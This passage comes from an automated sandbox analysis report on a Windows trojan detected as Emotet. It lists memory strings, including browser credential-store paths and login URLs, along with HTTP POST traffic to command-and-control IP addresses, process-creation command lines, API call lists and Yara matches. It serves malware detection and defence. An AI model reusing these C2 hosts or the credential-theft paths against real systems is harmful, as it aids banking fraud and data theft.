","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"
              Source: svchost.exe, 00000017.00000003.500382627.0000013EC0B61000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"
              Source: svchost.exe, 00000017.00000003.500382627.0000013EC0B61000.00000004.00000001.sdmpString found in binary or memory: % Regular free updates with loads of new content\r\n____________________________ \r\n\r\nGame available in: English, French, Italian, German, Spanish, Portuguese, Brazilian Portuguese, Russian, Korean, Simplified Chinese, Traditional Chinese, Japanese, Arabic\r\n____________________________ \r\n\r\nSign up now for a weekly round-up of the best from G5 Games! www.g5e.com/e-mail\r\n____________________________ \r\n\r\nG5 Games - World of Adventures"!!\r\nCollect them all! Search for \"g5\" in Windows Store! \r\n____________________________\r\n\r\nVISIT US: www.g5e.com\r\nWATCH US: www.youtube.com/g5enter\r\nFIND US: www.facebook.com/HiddenCityGame\r\nJOIN US: https://instagram.com/hiddencity_\r\nFOLLOW US: www.twitter.com/g5games\r\nTerms of Service: http://www.g5e.com/termsofservice \r\nG5 End User License Supplemental Terms: http://www.g5e.com/G5_End_User_License_Supplemental_Terms","ProductTitle":"Hidden City: Hidden Object Adventure","SearchTitles":[{"SearchTitleString":"find hidden objects ","SearchTitleType":"SearchHint"},{"SearchTitleString":"junes pearls free ","SearchTitleType":"SearchHint"},{"SearchTitleString":"ispy notes peril","SearchTitleType":"SearchHint"},{"SearchTitleString":"seekers mystery ","SearchTitleType":"SearchHint"},{"SearchTitleString":"puzzle manor solving","SearchTitleType":"SearchHint"},{"SearchTitleString":"sherlock hotel spot it","SearchTitleType":"SearchHint"},{"SearchTitleString":"murder game journey ","SearchTitleType":"SearchHint"}],"Language":"en","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductGame;1","ProductId":"9NBLGGH6J6VK","Properties":{"PackageFamilyName":"828B5831.HiddenCityMysteryofShadows_ytsefhwckbdv6","PackageIdentityName":"
              Source: PlayToStatusProvider.exe, 00000001.00000003.375062507.0000000003DC0000.00000040.00000001.sdmp, PlayToStatusProvider.exe, 0000000D.00000002.371834115.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: PlayToStatusProvider.exe, 00000001.00000003.375062507.0000000003DC0000.00000040.00000001.sdmp, PlayToStatusProvider.exe, 0000000D.00000002.371834115.0000000000400000.00000040.00000001.sdmpString found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: PlayToStatusProvider.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: PlayToStatusProvider.exe, 0000000D.00000003.371694877.0000000000A29000.00000004.00000001.sdmpString found in binary or memory: s://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/temp/Office16.x86.en-US.ISOfile:///C:/jbxinitvm.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
              Source: PlayToStatusProvider.exe, 0000000D.00000003.371694877.0000000000A29000.00000004.00000001.sdmpString found in binary or memory: s://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile://192.168.2.1/temp/Office16.x86.en-US.ISOfile:///C:/jbxinitvm.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
              Source: unknownHTTP traffic detected: POST /ZT6nLHo1gxz3xY/JMImc9LOLC/Wr2SAdLb9Gj/Nt0ts0h/RsZMGsR9d/ HTTP/1.1Referer: http://185.94.252.13/ZT6nLHo1gxz3xY/JMImc9LOLC/Wr2SAdLb9Gj/Nt0ts0h/RsZMGsR9d/Content-Type: multipart/form-data; boundary=---------------------------143050135578680User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.94.252.13:443Content-Length: 4612Connection: Keep-AliveCache-Control: no-cache
              Source: PlayToStatusProvider.exe, 00000001.00000002.535091750.0000000002BC0000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13/srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/
              Source: PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/9g7gFFV/NinW5U9mPGA0M/Bo6qnDoWpsmlH/fTLbJmHwPyJFH9Qve/ZKY6zL9FJ52LL/o0Cw35Z
              Source: PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/HoQFbYzR/64Wufep/XgnG0SnoE1Etk/Z9vUPsIyi2hWcj836/5xJjcW1tPtnqa9/
              Source: PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/HoQFbYzR/64Wufep/XgnG0SnoE1Etk/Z9vUPsIyi2hWcj836/5xJjcW1tPtnqa9/T
              Source: PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/
              Source: PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/3vdy8/hAPMeeivQqBzG6x5JO/
              Source: PlayToStatusProvider.exe, 00000001.00000002.535141689.0000000002C28000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/6
              Source: PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://185.94.252.13:443/srKk29pDnfcqLIxz/FKUF1tt/WZAmmwZTae7X7i/l
              Source: PlayToStatusProvider.exe, 00000001.00000002.535091750.0000000002BC0000.00000004.00000001.sdmpString found in binary or memory: http://71.50.31.38/xnRjTGq5HSmYVwq18Bj/KjF0oHtnzqg/
              Source: PlayToStatusProvider.exe, 00000001.00000003.361373164.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://71.50.31.38/xnRjTGq5HSmYVwq18Bj/KjF0oHtnzqg/(
              Source: PlayToStatusProvider.exe, 00000001.00000003.361373164.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://71.50.31.38/xnRjTGq5HSmYVwq18Bj/KjF0oHtnzqg/R
              Source: PlayToStatusProvider.exe, 00000001.00000002.535169999.0000000002D90000.00000004.00000001.sdmp, PlayToStatusProvider.exe, 00000001.00000002.535107565.0000000002BD7000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/J03oWp8HtqaUpdT4Ci/IvAn2Gl9W10Y7Wk/vCoQ0bbVqmAPaA1BFWG/
              Source: PlayToStatusProvider.exe, 00000001.00000002.535169999.0000000002D90000.00000004.00000001.sdmpString found in binary or memory: http://88.217.172.65:443/J03oWp8HtqaUpdT4Ci/IvAn2Gl9W10Y7Wk/vCoQ0bbVqmAPaA1BFWG/rovider.exe2l
              Source: svchost.exe, 00000017.00000003.498484955.0000013EC0B37000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
              Source: svchost.exe, 00000017.00000002.516830504.0000013EC0B00000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.d
              Source: svchost.exe, 00000017.00000003.498484955.0000013EC0B37000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
              Source: svchost.exe, 00000017.00000003.498484955.0000013EC0B37000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
              Source: svchost.exe, 00000003.00000002.304382632.0000025B3E613000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.comsv
              Source: svchost.exe, 00000017.00000003.500180026.0000013EC0B61000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.500270497.0000013EC0B83000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.500382627.0000013EC0B61000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
              Source: svchost.exe, 00000017.00000003.500180026.0000013EC0B61000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.500270497.0000013EC0B83000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.500382627.0000013EC0B61000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
              Source: svchost.exe, 00000017.00000003.499260882.0000013EC0B5B000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.499290232.0000013EC0B6C000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/privacy
              Source: svchost.exe, 00000017.00000003.499260882.0000013EC0B5B000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.499290232.0000013EC0B6C000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/terms
              Source: PlayToStatusProvider.exe, 0000000D.00000002.371809945.000000000019C000.00000004.00000010.sdmpString found in binary or memory: http://www.nirsoft.net
              Source: PlayToStatusProvider.exe, PlayToStatusProvider.exe, 0000000E.00000001.370035239.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.nirsoft.net/
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
              Source: svchost.exe, 00000003.00000003.304084752.0000025B3E65A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
              Source: svchost.exe, 00000003.00000002.304412312.0000025B3E63C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
              Source: svchost.exe, 00000003.00000003.304167369.0000025B3E645000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: svchost.exe, 00000003.00000003.281457851.0000025B3E630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
              Source: svchost.exe, 00000003.00000003.281457851.0000025B3E630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
              Source: svchost.exe, 00000003.00000002.304412312.0000025B3E63C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
              Source: svchost.exe, 00000003.00000003.281457851.0000025B3E630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
              Source: svchost.exe, 00000003.00000002.304416725.0000025B3E642000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
              Source: svchost.exe, 00000003.00000002.304416725.0000025B3E642000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
              Source: svchost.exe, 00000003.00000003.304084752.0000025B3E65A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
              Source: svchost.exe, 00000017.00000003.498484955.0000013EC0B37000.00000004.00000001.sdmpString found in binary or memory: https://displaycatalog.mp.microsoft.c
              Source: svchost.exe, 00000003.00000003.304084752.0000025B3E65A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000003.00000003.304084752.0000025B3E65A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000003.00000003.304084752.0000025B3E65A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000003.00000003.304167369.0000025B3E645000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
              Source: svchost.exe, 00000003.00000003.303865918.0000025B3E660000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
              Source: svchost.exe, 00000003.00000002.304412312.0000025B3E63C000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
              Source: svchost.exe, 00000003.00000003.281457851.0000025B3E630000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
              Source: svchost.exe, 00000017.00000003.500180026.0000013EC0B61000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.500270497.0000013EC0B83000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.500382627.0000013EC0B61000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
              Source: PlayToStatusProvider.exe, 0000000D.00000003.371694877.0000000000A29000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=000
              Source: PlayToStatusProvider.exeString found in binary or memory: https://login.yahoo.com/config/login
              Source: svchost.exe, 00000017.00000003.494838988.0000013EC0B56000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.494802441.0000013EC0B60000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.494749301.0000013EC0B33000.00000004.00000001.sdmpString found in binary or memory: https://picsart.com/privacy-policy?hl=en
              Source: svchost.exe, 00000003.00000002.304412312.0000025B3E63C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
              Source: svchost.exe, 00000003.00000002.304412312.0000025B3E63C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
              Source: svchost.exe, 00000003.00000003.304196410.0000025B3E656000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
              Source: svchost.exe, 00000003.00000003.304196410.0000025B3E656000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
              Source: svchost.exe, 00000003.00000003.281457851.0000025B3E630000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
              Source: svchost.exe, 00000003.00000002.304407756.0000025B3E639000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
              Source: svchost.exe, 00000003.00000003.304167369.0000025B3E645000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
              Source: svchost.exe, 00000017.00000003.498484955.0000013EC0B37000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
              Source: PlayToStatusProvider.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: svchost.exe, 00000017.00000003.499260882.0000013EC0B5B000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.499290232.0000013EC0B6C000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/ca-privacy-rights
              Source: svchost.exe, 00000017.00000003.499260882.0000013EC0B5B000.00000004.00000001.sdmp, svchost.exe, 00000017.00000003.499290232.0000013EC0B6C000.00000004.00000001.sdmpString found in binary or memory: https://www.hulu.com/do-not-sell-my-info
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 13_2_0040FDCB OpenClipboard,GetLastError,DeleteFileW,13_2_0040FDCB
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_0040C36D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,0_2_0040C36D
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_00414678 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,0_2_00414678
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_00448AF9 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,0_2_00448AF9
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.3377.7296.exeCode function: 0_2_004439D4 ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,0_2_004439D4
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_0040C36D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,1_2_0040C36D
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_00414678 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,1_2_00414678
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeCode function: 1_2_00448AF9 __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,1_2_00448AF9

              E-Banking Fraud:

              barindex
              Emotet Banking Trojan foundShow sources
              Source: unknownProcess created: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\8331.tmp'
              Source: unknownProcess created: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\85F1.tmp'
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeProcess created: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\8331.tmp'Jump to behavior
              Source: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exeProcess created: C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe 'C:\Windows\SysWOW64\mmc\PlayToStatusProvider.exe' /scomma 'C:\Users\user\AppData\Local\Temp\85F1.tmp'Jump to behavior
              Yara detected EmotetShow sources
              Source: Yara matchFile source: 00000001.00000002.534389058.0000000002230000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.273734251.00000000022B0000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.537497856.0000000003A90000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.364995711.00000000037DC000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.365206354.0000000003879000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.537572294.0000000003C40000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.361338829.0000000002649000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.273743388.00000000022C1000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.535381631.0000000003240000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.534410490.0000000002241000.00000020.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 1.2.PlayToStatusProvider.exe.3a90000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.PlayToStatusProvider.exe.3c40000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.PlayToStatusProvider.exe.3240000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.PlayToStatusProvider.exe.3a90000.7.unpack, type: UNPACKEDPE
